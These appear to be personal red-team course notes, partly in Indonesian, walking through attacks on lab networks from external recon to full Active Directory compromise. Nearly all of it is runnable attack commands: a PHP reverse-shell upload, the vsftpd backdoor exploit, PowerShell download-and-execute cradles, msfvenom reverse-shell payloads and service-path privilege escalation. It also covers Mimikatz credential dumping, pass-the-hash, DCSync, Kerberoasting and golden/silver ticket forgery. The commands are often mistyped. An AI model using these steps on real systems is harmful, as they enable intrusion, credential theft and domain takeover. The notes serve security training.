** Intro
* FInd-PSRemoteingAdminAccess.ps1
* Find-PSServiceAccounts.ps1
* Find-WMILocalAdminAccess.ps1
* Invoke-Mimikatz.ps1
* PowerUp.ps1
* PowerView_dev.ps1
* tgsrepcrack.py
* 10k-most-pass.txt
* Python
** Red Team Lab Setup
External Read Team Lab Setup
Virtualbox Downloads
- Kali-Linux Downloads
VLAN 1 : 192.168.50.0/24
Kali IP : 192.168.50.2
- metasploitable-2 Downloads
IP 1 : 192.168.50.3
IP 2 : 10.10.10.5
Internal Read Team Lab Setup
VLAN 2 : 10.10.10.0/24
- Domain Controller Downloads
IP : 10.10.10.2
- App Server Downloads
IP : 10.10.10.3
- Computer User Downloads
IP : 10.10.10.4
** Red Teaming in External Environment
External Red Team Operations
Reconnaissance
- - Active Reconnaissance
- - Pasive Reconnaissance
Scanning & Enumeration
- Host Discovery
NetDiscover
- TCP Port Scanning
NetDiscover is a very neat tool for finding hosts on either wireless or switched
networks.
netdiscover -i [interface] -r [IP address CIDR format]
Contoh : netdiscover -r 10.10.10.0/24
Nmap
-sn
Command : nmap -sn [port] [IP]
- - TCP Full Scan
- - TCP SYN Scan (Stealth Scan)
- - TCP ACK Scan
- - TCP FIN/RST/PSH Scan
- Service version Detection
Nmap
- OS detection
Command : nmap -p 22 -sV [IP]
Nmap
- UDP Port Scanning
Command : nmap -p 22 -sV [IP]
Vulnerability Assessment
• Vulnerability assessment is a systematic review of security weaknesses in an
information system.
• It evaluates if the system is susceptible to any known vulnerabilities, assigns severity
levels to those vulnerabilities, and recommends remediation or mitigation, if and
whenever needed.
• It follows a 4-step process :
1. Vuln Identification
2. Analysis
3. Risk Assessment
4. Remediation
Tools Vulnerability Assessment
- Nessus
- Acunetix
- Qualys Vulnerability Management
- Netsparker
- Metasploit
- Amazon Inspector (ONLY for applications deployed on AWS)
- Nikto (for web application)
- nmap (for both Network as well as web app)
DEMO
nmap -p 21 -sV 192.168.50.3
nmap --script-help | ftp
namp --script ftp-vsftpd-backdoor -p 21 192.168.50.3
External Red Team Operations Part 2
Web-Based
DEMO
Test Webserver
nc [ip] [port]
Jika sudah melihat apa saja yang allow gunakan cadaver
OPTIONS http://[IP] HTTP/1.0
host:[IP]
BISA JUGA
OPTIONS http://[IP]/[PATH] HTTP/1.0 ex: OPTIONS http://192.168.50.3/dev HTTP/1.0
host:192.168.50.3
cadaver http://192.168.50.3/dev
Edit file webshsell
nono /usr/share/webshells/php/php-reverse-shell.php
uploads web sell
ubah
cadaver http://192.168.50.3/dev
jika sudah maka file shell.php akan ada di dirctory /dev
put /usr/share/webshells/php/php-reverse-shell.php
Exsekusi mulai listening:
nc -nlvp [sesuai port yang di set di shell.php]
oke sudah berhasil masuk :
ke web -> path /dev klik shell.php
jika berhasil maka terminal akan ada reaksi
whoami #CEK USER SIAPA KITA
/sbin/ifconfig #CEK IP YANG TERHUBUNG
cat ect/passwd #MELIHAT DAFTAR PASSWORD
Network Exploitation
* Network means connection of more than one system so that they can communicate with each other. There can be multiple systems on a single network
* Exploitation of network means abusing network-level functionalities.
* Identification of open ports, the services specifically it’s version is important before exploiting any system.
* The main motive of the attacker is to gain access to sensitive information like passwords, classified files and bank account details present in the information system.
* We will try to find vulnerabilities in the target system to secure the network.
* We will automate the typical process of exploitation using Metasploit.
DEMO
msfconsole
search vsftpd
use 0 atau bisa juga use exploit/unix/ftp/vsftpd_234_backdoor
show options dan isi yang perlu di isi ex: set RHOSTS 192.168.50.3 dan set verbose true
run
whaoami //CEK USER SIAPA KITA
ifconfig //CEK IP YANG TERHUBUNG
python -c "import pty;pty.spawn('/bin/bash')" //AGAR TAMPILAN SEPERTI DI KALI ada # or $ (webshell)
Post-Exploitation
* The goal is to maintain foothold on the compromised system after successful exploitation.
* After going through the cumbersome efforts of enumerating the target, finding vulnerabilities & then exploiting the weak links, we need persistence.
* Various persistence methods exists depending on the nature of the target system.
* Methods: -
- - User land persistence
- - Kernel land persistence (Out of scope for this course)
- - Boot-level persistence (Out of scope for this course)
* Off course, kernel land persistence is something that is very hard to detect & is generally requires some deep level analysis of the persistence.
* Hackers can fool the victim by persisting on the user land space, we will soon look at various ways to achieve persistence on victim machine.
** Network Pivoting
DEMO
jika sudah ada access ssh :
ssh msfadmin@192.168.50.3
coba menggunakan port :
sudo -l
ssh -D 8090 msfadmin@192.168.50.3
Pantau aktivitas :
neststat -ant | grep 8090
Tambahkan Proxychains :
nano /etc/proxychains.conf
cek ip yang terhubung ke PC user di ssh dengan command
tambahkan
socks4 127.0.0.1 8090
jika sudah tau ip mana yang akan kita tuju maka :
proxychains nc -nv 10.10.10.4 [PORT]
Cari kredensial di ssh tadi, bisa juga di
EX : proxychains nc -nv 10.10.10.4 445 //CEK PORT OPEN ATAU TIDAK
sebagai contoh: di sini kita dapat kredensial Username : cyberwarfare\employee Password: Password@963 di log vnc.log
RDP ke kredensial yang kita dapatkan :
proxychains rdesktop 10.10.10.4
masukan kredensial yang kita dapatkan
** Red Teaming Internal Environment
1. Introduction
Internal Infrastructure Overview
Gambar Topologi
Infrastructure Enumeration
* Here, we will try to focus more on mapping the networking devices, hosts present in the Internal environment.
* The Attackers leverage in-built tools to enumerate and map live hosts in the environment.
* Since, the internal network mostly comprises of Active Directory environment, we will focus on Abusing the mis-configuation.s.
* Tools like
* Below is the command for scanning open TCP ports from a PowerShell Query.
1..1024 | % {echo ((new-object Net.Sockets.TcpClient).Connect("10.0.0.100",$_)) "Port $_ is open!"} 2>$null
* Below command will scan IP addresses 10.1.1.1-5 and some specific common TCP ports.
1..20 | % { $a = $_; write-host "------"; write-host "10.0.0.$a"; 22,53,80,445 | % {echo ((new-object Net.Sockets.TcpClient).Connect("10.1.1.$a",$_)) "Port $_ is open!"} 2>$null}
Active Directory Essentials
* In the local environment we have 3 machines setup in a domain environment
* One can use Windows PowerShell, Windows native executable for the enumeration and exploitation purposes.
* In-scope IP address range :
- - 10.10.10.2 Domain Controller
- - 10.10.10.3 Application Server
- - 10.10.10.4 Employee System
* It is a .NET interpreter which comes installed by-default on all Windows versions.
* One can execute binaries and scripts completely in-memory using PowerShell.
* Through PowerShell one can administer a network and provides access to manage Active Directory environment.
* Useful for Lateral Movement scenarios
- - PowerShell Remoting
- - Web-Based PowerShell Remoting
* Scripts with extension “*.ps1”, “*.psm1”, “*.psd1” etc can be invoked in a specific
PowerShell session as follows :
Import-Module <Module_Name.ps1>
* However a PowerShell script can be invoked in a unique way called “dot sourcing a script”
. .\<Script_Name>.ps1
Bypass :
powershell -ep bypass
Select Object:
Get-NetUser | Select-Object givenname
iex (iwr 'http://192.168.2.2/file.ps1')
$down = [System.NET.WebRequest]::Create("http://192.168.2.2/file.ps1") $read = $down.GetResponse() IEX ([System.IO.StreamReader]($read.GetResponseStream())).ReadToEnd()
$file=New-Object -ComObject Msxml2.XMLHTTP;$file.open('GET','http://192.168.2.2/file.ps1',$false);$file.send();iex $file.responseText
iex (New-Object Net.WebClient).DownloadString('https://192.168.2.2/reverse.ps1')
$ie=New-Object -ComObject InternetExplorer.Application;$ie.visible=$False;$ie.navigate('http://192.168.2.2/reverse.ps1 ‘); sleep 5;$response=$ie.Document.body.innerHTML;$ie.quit();iex $response
Active Directory Phases Exploitation
Gambar
* We already have access to the internal environment.
* Credentials of a user is found on the Web-Server, which gave us access to the Employee-Machine.
* In-built functionalities like PowerShell and WMI can be used for situational awareness in the network.
* Adversary always heads for the direction of placement or setup of critical asset of a company.
* We will use PowerView for enumeration.
* Get current domain :
Get-NetDomain
* Retrieve Current SID and Domain Controller :
Get-NetDomain –Domain cyberwarfare.corp
Get-NetDomainController –Domain cyberwarfare.corp
* Retrieve a list of users in the current domain :
Get-DomainSID
Get-NetUser
* Retrieve a list of computers in the current domain :
Get-NetUser –UserName emp1
Get-NetComputer
* List all domain groups in the current domain :
Get-NetComputer – FullData
Get-NetComputer –OperatingSystem “Windows Server 2016 Standard”
Get-NetGroup
* Enumerate privilege domain group members and local administrators
group members:
Get-NetGroup –FullData
Get-NetGroup –Domain cyberwarfare.corp
Get-NetGroupMember –GroupName “Domain Admins” -verbose
* ACL Enumeration, get the ACLs associated with an entity:
Get-NetGroupMember –Identity “Domain Admins” -verbose
Get-NetLocalGroup –ComputerName DC-01 -ListGroups
Get-ObjectAcl -SamAccountName <Domain_User> –ResolveGUIDs
* Unique and interesting ACL Scanning :
Invoke-ACLScanner –ResolveGUIDs -Verbose
* Enumerate Domain Trusts :
Invoke-ACLScanner –ResolveGUIDs
Get-NetDomainTrust
* Enumerate all domain in a Forest :
Get-NetDomainTrust –Domain cyberwarfare.corp
Get-NetForestDomain –Verbose
* Find computer sessions where current user has local admin access :
Get-NetForest -Verbose
Find-LocalAdminAccess -Verbose
* An Adversary tries to escalate privileges from low to high (Administrator, root)
* There are various vulnerabilities that can be abused on Windows/Linux environment :
- - Abuse Elevation Control Mechanism [ T1548 ]
- - Access Token Manipulation [T1134 ]
- - Boot or Logon Auto-start Execution [T1547 ]
- - Boot or Logon Initialization Scripts [T1037 ]
- - Create or Modify System Process [T1543 ]
- - Event Triggered Execution [T1546 ]
- - Exploitation for Privilege Escalation [T1068 ]
- - Process Injection [T1055 ]
- - Scheduled Task/Job [T1053 ]
- - Valid Accounts [T1078 ]
* PowerUP can be used to escalate locally in a Windows environment.
https://github.com/PowerShellMafia/PowerSploit/tree/master/Privesc
Import-Module .\PowerUp.ps1 OR . .\PowerUP.ps1
Jika masih tidak Bisa
powershell -ep bypass
Invoke-AllChecks –Verbose
* List services which can be configured :
Get-ModifiableService -Verbose
* Unquoted Service Path :
Get-ServiceUnquoted -Verbose
membuat Backdor di kali :
msfvenom -p windows/adduser USER=backdoor_admin PASS=admin1234 -f exe > service.exe
Uploads File dari Kali ke web agar bisa di downloads di windows :
sudo python -m SimpleHTTPServer 80
Ke windows dan access Ip kali di web:
setelah di downloads Tempel di Local Disk C: realname menjadi Program.exe
jika sudah restart computer harunya sudah membuat/create user baru backdoor_admin
powershell -ep bypass
. .\PowerUP.ps1
Invoke-AllChecks –Verbose
cek service permissions :
sc.exe qc snmptrap
Ubah Config Join username
sc.exe config snmptrap binpath="net localgroup administrators cyberwarfare\employee /add"
Cek Perbedaanya lagi :
sc.exe qc snmptrap
Restart Services :
Restart-Service nsmptrap -Verbose
cek di cmd apakah username cyberwarfare sudah masuk ke local administrator :
net localgroup administrator
jika sudah coba masuk ke powershell adminstartor jika belum bisa coba signout terlebih dahulu
3. Credential Dumping
* With enough privileges on the Local machine the Adversary will try to perform where Admin users are logged-on. Technique Example : Credential Dumping.
* Service accounts generally have Administrator privileges in a machine.
* Well-known attacks like Kerberoasting can be used to brute-force service account credentials.
* We need to find users where a high-privilege domain user like Domain Admin has sessions, this can be done using “Invoke-UserHunter” query.
DEMO
https://github.com/PowershellMafia/Powersploit/blob/master/Exfiltration/Invoke-Mimikatz.ps1
powershell -ep bypass
Jika masih tidak bisa :
..\Invoke-Mimikatz.ps1
wghoami
Invoke-Mimikatz -DumpCreds -Verbose
Invoke-Mimikatz -Command '"sekurlsa::pth /user:emp_svc /domain:cyberwarfare.corp /rc4:<hash> /run:powershell.exe"'
OR
Invoke-Mimikatz -Command '"sekurlsa::pth /user:emp_svc /domain:cyberwarfare.corp /rc4:<hash> /run:powershell.exe"' -Verbose
cd C:\Users\employee\Downloads\
powershell -ep bypass
..\Find-WMILocalAdminAccess.ps1
Find_WMILocalAdminAccess -Verbose
4. Lateral Movement
* The Adversary will try to move laterally in the environment in search for some critical servers/assets.
* Some of the techniques that can be used are :
- - PowerShell Remoting
- - Windows Management Instrumentation (WMI)
- - Invoke-Mimikatz.ps1 etc
* It is advised to choose a method which is stealth and leave almost no footprints on ANY machines the Adversary is targeting.
* It used WinRM protocol and runs by-default on TCP ports 5985 (HTTP) and 5986 (HTTPS)
* It is a recommended way to manage Windows core servers.
* This comes enabled by-default from Windows Server 2012.
* Adversary uses this utility to connect to remote computers/servers and execute commands upon achieving high privileges.
* Example : Invoke-Command, New-PSSession, Enter-PSSession
* Configuration is easy “Enable-PSRemoting -SkipNetworkProfileCheck -Verbose -Force” as administrator
* It is used to run commands and scripts on :
- - Windows Servers/workstations
- - Linux machines too (PowerShell is Open-Source project)
* Example commands :
1. $session = New-PSSession –Computername Windows-Server -Verbose
2. Invoke-Command –Session $session –ScriptBlock {Whoami;hostname atau ipconfig} -Verbose
3. Enter-Pssession –Session $session -verbose
* Used for dumping credentials, Kerberos tickets etc all in-memory.
* Run with Administrative privileges for performing credential dumping operations.
* Ex : (As Administrator)
Invoke-Mimikatz -DumpCreds -Verbose
* Most famous Pass-the-hash attack:
Invoke-Mimikatz –DumpCreds –ComputerName @(“comp1”,”comp2”)
Invoke-Mimikatz -Command '"sekurlsa::pth /user:Administrator /domain:cyberwarfare.corp /hash:[nilai hash primary] /run:powershell.exe"' -Virbose
$session = New-PSSession –Computername app-Server -Verbose
$session
Invoke-Command –Session $session –ScriptBlock {Whoami;ipconfig} -Verbose
Enter-Pssession –Session $session -verbose
whoami
hostname
ipconfig
net user
klist
exit
powershell -ep bypass
..\Invoke-Mimikatz.ps1
Jika tidak bisa matikan windows raltime-protction
Invoke-Mimikatz
Invoke-Mimikatz –ComputerName app-server -Verbose
net user [uername primary] /domain
5. Exploitation
* Adversary can export that TGT to access any other resource as that user. Now imagine the consequences when we get the TGT of a Domain Admin.
* List computers having Unconstrained Delegation Enabled :
Get-NetComputer –unconstrained -verbose
* Adversary can compromise the Server where Unconstrained Delegation is enabled.
* Using Social engineering an adversary can trick the domain admin or any privileged user to connect to the already compromised server.
* Extract the Domain Admin TGT :
Invoke-Mimikatz –Command '"sekurlsa::tickets /export"'
* Re-use the ticket to perform other operations as Domain Admin :
Invoke-Mimikatz –Command '"kerberos::pttticket.kirbi"'
* Run DCSYNC Attack :
Invoke-Mimikatz -Command '"lsadump::dcsync /user:cyberwarfare\krbtgt"'
..\Invoke-Mimikatz.ps1
Invoke-Mimikatz -Command '"sekurlsa::pth /user:app-svc /domain:cyberwarfare.corp /ntlm:[nilai ntlm primary] /run:powershell.exe"' -Verbose
New Terminal
powershell -ep bypass
..\PowerView_dev.ps1
Invoke-CheckLocalAdminAccess -ComputerName dc01 -Verbose
jika dc01 false
Invoke-CheckLocalAdminAccess -Verbose
Get-NetDomainController -Verbose
cek Namenya
Invoke-CheckLocalAdminAccess -ComputerName DC-01.cyberwarfale.corp -Verbose
$sess = New-PASSession -ComputerName DC-01.cyberwarfare.corp -Verbose
Invoke-Command -Session $sess -ScriptBlock {ipconfig:hostname} -Verbose
Enter-PSSession -Session $sess -Verbose
whoami
6. Kerberoasting
* We send all the required details to DC to get a valid TGT, this TGT can be used to get a TGS (for authorization) to access any specific service.
* Upon getting the TGS (encrypted with target service account hash), one can export it and then brute-force it against a password dictionary.
* Also, Administrator generally do not focus on changing the credentials of non-machine service account, we end up getting the clear-text credentials ☺
* In-short, it is the offline brute-forcing of service account credentials.
GAMBAR
* Find User accounts which are used as service accounts :
Get-NetUser –SPN
* We request the TGS aka service ticket :
Request-SPNTicket
* Check ticket in-memory:
klist
* Export ticket using Mimikatz :
Invoke-Mimikatz -Command '"kerberos::list /export“’
* Now, Crack the Service account password using tgsrepcrack.py
python.exe .\tgsrepcrack.py .\passwords.txt ‘.\Ticket.kirbi'
Lain :
./tgsrepcrack.py wordlist.txt <.kirbi>
setspn -T cyberwarfare.corp -Q */*
Ke kalilinux
Add-Type -AssemblyName System.IdentityModel
New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList "HTTP/portal.cyberwarfare.corp"
klist
Invoke-Mimikatz -Command '"Kerberos::list /export"' -Verbose
python tgsrepcrack.py 10k-worst-pass.txt [hasil downloads]
7. Forging Silver Ticket
* Once critical assets are identified with enough privileges, Adversaries will try to establish long-term persistence and try to exfiltrate data stealthily.
* For Data Exfiltration adversary can use various protocols to remain under the hood.
* Some of the data exfiltration techniques are mentioned below :
- - Automated Exfiltration [T1020 ]
- - Exfiltration Over Alternative Protocol [T1048 ]
- - Exfiltration Over Physical Medium [T1052 ]
- - Transfer Data to Cloud Account [T1537 ]
* Golden ticket is signed and encrypted with the “krbtgt” account hash.
* The krbtgt account hash can be use to impersonate any user with any privileges.
* Requirements :
- - Domain SID
- - Krbtgt hash
- - Domain name
- - SIDS (in Cross-Forest Attacks)
* Extract krbtgt account hash :
Invoke-Mimikatz -Command '"lsadump::dcsync /user:cyberwarfare\krbtgt"'
* Domain SID :
whoami/all (of a domain user)
* Adversary Forge Golden ticket in a Domain as follows :
Invoke-Mimikatz -Command '"kerberos::golden /User:Administrator /domain:cyberwarfare.corp /sid:S-1-5-21-xxxxx-yyyyy-xxxxx /krbtgt:xxxxxxxxxxxxxxxxxx /startoffset:0 /endin:600 /renewmax:10080 /ptt"'
* Silver ticket is signed and encrypted with the target service account hash.
* Represents a valid TGS (for authorization)
* Requirements :
- - Domain SID
- - Service account /Machine Account hash
- - Domain name
- - SIDS (in Cross-Forest Attacks)
* In order to extract the domain user account/service account/machine account credentials without code execution on the Domain Controller the Adversary used DCSYNC Attack.
* Specific set of privileges are required to perform remote hash retrievable without code execution.
- - Get-ReplicationChanges
- - Get-ReplicationChangesAll
- - Get-ReplicationChnages-in-a-filtered-set
Command :
Invoke-Mimikatz -Command '"lsadump::dcsync /user:cyberwarfare\krbtgt"'
* Extract krbtgt account hash :
Invoke-Mimikatz -Command '"lsadump::dcsync /user:cyberwarfare\dc-01$"'
* Domain SID :
whoami/all (of a domain user)
* Adversary Forge Golden ticket in a Domain as follows :
Invoke-Mimikatz -Command '"kerberos::golden /User:Administrator /domain:cyberwarfare.corp /sid:S-1- 5-21-yyyyyyyy-zzzzzzzzzz-xxxxxx /target:enterprise-dc.cyberwarfare.corp /service:cifs /rc4:<HASH> /id:500 /groups:512 /startoffset:0 /endin:600 /renewmax:10080 /ptt"'
* Adversaries create a silver ticket for HOST service which allows them to schedule a malicious task on the target :
Invoke-Mimikatz -Command '"kerberos::golden /User:Administrator /domain:cyberwarfare.corp /sid:S-1-5-21-xxxxxx-yyyy-zzzzz /target:exterprise-dc.cyberwarfare.corp /service:HOST /rc4:xxxxx /id:500 /groups:512 /startoffset:0 /endin:600 /renewmax:10080 /ptt"'
Invoke-Mimikatz -Command '"lsadump::dcsync /user:cyberwarfare\DC-01$"' -Verbose
whaoami
ls \\DC-01\c$
jika Access denied
whaomai /all
powershell -ep bypass
..\Invoke-Mimikatz.ps1
Invoke-Mimikatz -Command '"kerberos::golden /User:Administrator /domain:cyberwarfare.corp /sid:[hasil whoami /all 4 angka terakhir jagan di masukin] /target:DC-01.cberwarfare.corp /service:cifs /rc4:[ntlm hash] /id:500 /groups:512 /startoffset:0 /endin:600 /renewmax:10080 /ptt"' -Verbose
klist
ls \\DC=01.cyberwarfare.corp\c$
8. Persistence
* Schedule and execute a task on Remote Server :
schtasks /create /S enterprise-dc.cyberwarfare.corp /SC Weekly /RU "NT Authority\SYSTEM" /TN “lateral" /TR "powershell.exe -c 'iex (New-Object Net.WebClient).DownloadString(''http://10.10.10.1:8000/InvokePowerShellTcp.ps1''')'"
schtasks /Run /S enterprise-dc.cyberwarfare.corp /TN "STCheck"
Enter-PSSession -Session $sess -Verbose
$sess
whaoami
exit
$sess
..\Invoke-Mimikatz.ps1
Invoke-Command -Session $sess -FilePath .\Invoke-Mimikatz.ps1 -Verbose
Enter-PSSession -Session $sess
Browsing ke AMSI.fails, copy script, paste di terminal
exit
Invoke-Command -Session $sess -FilePath .\Invoke-Mimikatz.ps1 -Verbose
Enter-PSSession -Session $sess
Invoke-Mimikatz -Command '"lsadump::dcsync /user:cyberwarfare\krbtgt"'
whaomai
..\Invoke-Mimikatz.ps1
whaoami /all
PowerView_dev.ps1
Get-DomainSID -Verbose
Invoke-Mimikatz -Command '"kerberos::golden /User:Administrator /domain:cyberwarfare.corp /sid:[hasil whoami /all 4 angka terakhir jagan di masukin] /krbtgt:[NTLM HASH] /startoffset:0 /endin:600 /renewmax:10080 /ticket:identity.kirbi"' -Verbose
OR
Invoke-Mimikatz -Command '"kerberos::golden /User:Administrator /domain:cyberwarfare.corp /sid:[hasil whoami /all 4 angka terakhir jagan di masukin] /krbtgt:[NTLM HASH] /startoffset:0 /endin:600 /renewmax:10080 /ptt"' -Verbose
klist
** Case Study 30 Hari Access
Lab Overview
001-Initial Access
* VPN IP Range : 10.10.200.0/24
* External IP Range in Scope : 192.168.80.0/24
* Internal IP Range in Scope : 192.168.98.0/24
nmap -sn 192.168.80.0/24
nmap -sn 192.168.98.0/24
nmap -sC -sV 192.168.80.10
Access Googel Chrome sesuai ip yang kita dapatkan, gunakan burpsuite "Gunakan Search, or gmail subscribe ganti searchnya menggunakan :ls atau gmailnya ganti :ls send to Repeater apakah ada tampilan yang berubah."
jika ada respon file sensitf keluar coba ganti ke :cat /etc/passwd
USER / password: privilege / Asmin@962
jika sudah mendapatkan access coba ke ssh karena port ssh terbuka
ssh privilege@192.168.80.10
002-Enumeration
* Tools crta
* Agar File bisa di Ambil dari server privilege@192.168.80.10
python3 -m http.server
ke Linux Korban untuk abil file
cd /tmp
cek user Privilege
curl http://[IP KALI KITA]:8000/linpeas.sh >> linpeas.sh
chmod +x linpeas.sh
./linpeas.sh
cek semua log, or searching apa saja yang perlu di perhatikan ketika menggunakan tools tersebut.
sudo -l
ip a
melihat hidden file
nmap -sn 192.168.98.0/24
nmap -sC -sV [ip yang terdiscovery]
ls -lah
Baca semua log History, di vidio dia menumkan kridensial nya di .vnc_log
cd .mozila
cd firefox
cd on82i5pd.default-release/
ls | grep pla
sqlite3 places.sqlite
.tables
select * from moz_bookmarks
;
#Menampilkan Bookmarks yang di simpan di video dia menyimpan url beserta passwordnya
.quit
003-pivoting-ssh
sudo apt install proxychains
sudo nano /etc/proxychains.conf
ADD PROXCYLIST
socks5 127.0.0.1 9050
socks4 127.0.0.1 9050
ssh -D 9050 privilege@192.168.80.10
jika sudah terhubung coba ping ip windows dari kali kta
proxychains ping 192.168.98.30
#Jika sudah repply coba cek port menggunkan NC
proxychains nc 192.168.98.30 445
OR
nc 192.168.98.30 445
Scanning
proxychains nmap -sT 192.168.98.30
proxychains nmap -sn 192.168.98.30
004-Pivoting-Rpivot
Activate rpivot
conda create -n rpivot python=2.7
conda activate rpivot
Cek aktivitas:
netstat -ano | grep 4050
SSH
ssh -D 9050 privilege@192.168.80.10
Ke Tools uploads Rpivot.zip
Transfer file
python3 -m http.server
Downloads Rpivot.zip di linux Korban
curl http://[IP KALI KITA]:8000/rpivot.zip --output rpivot.zip
SET KALI:
unzip rpivot.zip
cd rpivot
cd rpivot-master/
python client.py --server-ip [IP KALI] --server-port 9980
python2 server.py --server-port 9980 --server-ip 0.0.0.0 --proxy-ip 127.0.0.1 --proxy-port 9050
proxyxhains nmap -sn 192.168.98.30
proxyxhains nmap -sT 192.168.98.30
proxyxhains nmap -sC -sV 192.168.98.30
sudo nano /etc/proxychains.conf
Disable PROXCYLIST
#socks5 127.0.0.1 9050
005-Internal-Access
ssh -D 9050 privilege@192.168.80.10
python3 -m pip install impacket
Install CrackMapExec
cd tools
cd CrackMapExec
apt-get install -y libssl-dev libffi-dev python-dev build-essential
git clone --recursive http://github.com/byt3bl33d3r/CrackMapExec
cd CrackMapExec
poetry install
poetry run crackmapexec
poetry run cme
poetry run cme smb 192.168.98.30 -u employee -p password123@ #username dan password yang di dapatkan di log .vnc_log
OR
proxyxhains poetry run cme smb 192.168.98.30 -u employee -p password123@
proxyxhains poetry run cme smb 192.168.98.30 -u john -p @dminP$ass
proxyxhains psexec.py 'child/john:@dminP$ass@192.168.98.30'
whaoami
net user /dom
ping [DOMAIN NAME] #ex:child.warfare.corp
net group /dom
ping [DOMAIN NAME LENGKAP] #ex:child.warfare.corp
ping [DOMAIN NAME TIDAK LENGKAP] #ex:warfare.corp, apakah nanti ipnya berbeda atau tidak
msfvenom --platform windows -p windows/shell_reverse_tcp LHOST=[IP KALI] LPORT=9990 -f exe -o rev.exe
nc -nvlp 9990
powershell
Balik lagi ke tab nc -nvlp
iwr http://[IP KALI]:8000/rev.exe -OutFile C:\User\[USERNAME]\Downloads\rev.exe
exit
cd C:\User\[USERNAME\Downloads
dir
rev.exe
net user /dom
net user [USERNAME] /dom
net user [USERNAME LAIN] /dom #di coba semua sampai dapat administrator
net localgrup Administrator
006-Lateral movement
Masih di tab nc -nvlp
C:\User>
KALI CEK USER YANG LAIN MENGGUNAKAN NTLM yang barusakan kita dapatkan
dir
whoami /priv
whoami
cd [username]
powershell
iwr http://[IP KALI]:8000/mimikatz.exe -OutFile C:\User\[USERNAME]\Downloads\mimikatz.exe
cd Downloads
mimikatz.exe
jika tidak bisa keluar dari powershell
exit
mimikatz.exe
sekurlsa::logonpasswords
proxyxhains poetry run cme smb 192.168.98.120 -u corpmngr -H :[HASH NTLM] #JIKA HASIL TIMEOUT COBA DENGAN IP LAIN YANG SUDAH DIDAPATKAN hingga (PWn3d!)
proxyxhains psexec.py 'child/corpmngr@192.168.98.120' -hashes :[HASH NTLM] #JIKA TIDAK BISA COBA SEMUA IP
ipconfig
net user /dom
007-Moving Child DC to Parent DC - part 1
Create Pyloads :
msfvenom --platform windows -p windows/shell_reverse_tcp LHOST=[IP KALI] LPORT=9990 -f exe -o rev.exe
conda deactivate
Ambil File
cd C:\Users
balik ke terminal listening port
dir
cd Downloads
powershell
iwr http://[IP KALI]:8000/rev.exe -OutFile C:\User\[USERNAME]\Downloads\rev.exe
exit #Exit Powershell
RUN PROGRAM
dir
rev.exe #Agar si lstening masuk
exit
ipconfig
net user /dom
powershell
iwr http://[IP KALI]:8000/PoweView.ps1 -OutFile C:\User\[USERNAME]\Downloads\PoweView.ps1
import-modul .\PowerView.ps1
Get-ADTrust -Filter *
Get-DomainTrust -Filter *
Get-ADForest
(Get-ADForest).Domains
net localgroup Administrator
Get-ADDomain -Server child.warfare.corp
DomainSID:
Get-DomainSID -Domain warfare.corp
YANG PARRENT INI JUGA DI COPY
Get-NetForestDomain
(Get-NetForestDomain).DomainControllers
exit
iwr http://[IP KALI]:8000/mimikatz.exe -OutFile C:\User\[USERNAME]\Downloads\mimikatz.exe
exit #EXIT POWERSHELL
mimikatz.exe
lsadump::dcsync /domain:child.warfare.corp /user:krbtgt
lsadump::dcsync /domain:child.warfare.corp /all #Youtube
lsadump::dcsync /user:krbtgt
exit
klist
dir \\dc01.warfare.corp\C$ #access denied
mimikatz.exe
kerberos::golden /user:Administrator /domain:child.warfare.corp /sid:[nilai SID parent] /sids:[nilai SID Child]-519 /aes256:[nilai KRBTGT AES256] /startoffset:-5 /endin:600 /renew:10080 /ptt
exit
dir \\dc01.warfare.corp\C$
klist
proxyxhains secretsdump.py 'child/corpmngr@192.168.98.120' -hashes :[HASH NTLM]
# copy : KRBGT:
# copy : KRBGT AES256
cd C:\Users\[USERNAME]
008-Moving Child DC to Parent DC - part 2
powershell
iwr http://[IP KALI]:8000/PsExec.exe -OutFile C:\User\[USERNAME]\Documents\PsExec.exe
exit
PsExec.exe -accepteula \\dc01.warfare.corp cmd.exe
or
PsExec.exe \\dc01.warfare.corp cmd.exe
Jika tidak jalan
conda deactive
nc -nvlp 8888
iwr http://[IP KALI]:8000/derev.exe -OutFile C:\User\[USERNAME]\Documents\derev.exe
exit #EXIT POWERSHELL
dir \\dc01.warfare.corp\c$
copy derev.exe \\dc01.warfare.corp\C$\derev.exe
dir \\dc01.warfare.corp\c$
PsExec -d \\dc01.warfare.corp cmd /c "C:\derev.exe"
ipconfig
net user /dom
whaoami
cd C:\Users
dir
Complete these THM rooms on Active Directory attacks
* https://tryhackme.com/module/hacking-active-directory
* https://tryhackme.com/room/breachingad
* https://tryhackme.com/jr/lateralmovementandpivoting
* https://tryhackme.com/room/attacktivedirectory
* https://tryhackme.com/room/exploitingad
* https://tryhackme.com/room/credharvesting